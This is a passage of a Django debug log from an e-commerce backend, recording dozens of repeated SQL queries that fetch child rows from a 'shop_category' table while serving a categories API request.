13:40:46,058 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 13:40:46,060 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 13:40:46,062 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 13:40:46,064 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 13:40:46,067 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 13:40:46,069 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 13:40:46,071 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 13:40:46,075 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 13:40:46,077 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 13:40:46,079 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 13:40:46,081 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 13:40:46,083 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 13:40:46,085 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 13:40:46,087 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 13:40:46,090 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 13:40:46,092 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 13:40:46,094 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 13:40:46,096 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 13:40:46,098 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 13:40:46,101 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 13:40:46,103 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 13:40:46,105 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 13:40:46,107 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 13:40:46,109 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 13:40:46,112 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 13:40:46,114 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 13:40:46,116 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 13:40:46,118 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 13:40:46,120 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 13:40:46,126 utils 4252 140031747061504 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 13:40:46,128 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 13:40:46,130 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 13:40:46,132 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 13:40:46,134 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 13:40:46,138 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 13:40:46,140 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 13:40:46,142 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 13:40:46,144 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 13:40:46,147 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 13:40:46,150 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 13:40:46,153 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 13:40:46,155 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 13:40:46,158 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 13:40:46,160 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 13:40:46,162 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 13:40:46,165 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 13:40:46,169 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 13:40:46,172 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 13:40:46,174 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 13:40:46,177 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 13:40:46,179 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 13:40:46,182 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 13:40:46,185 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 13:40:46,187 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 13:40:46,189 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 13:40:46,192 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 13:40:46,195 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 13:40:46,198 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 13:40:46,201 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 13:40:46,203 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 13:40:46,205 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) DEBUG 2019-12-18 13:40:46,206 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 13:40:46,209 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 13:40:46,213 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) [18/Dec/2019 13:40:46] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 13:40:46,217 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 13:40:46,220 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 13:40:46,223 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 13:40:46,226 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", 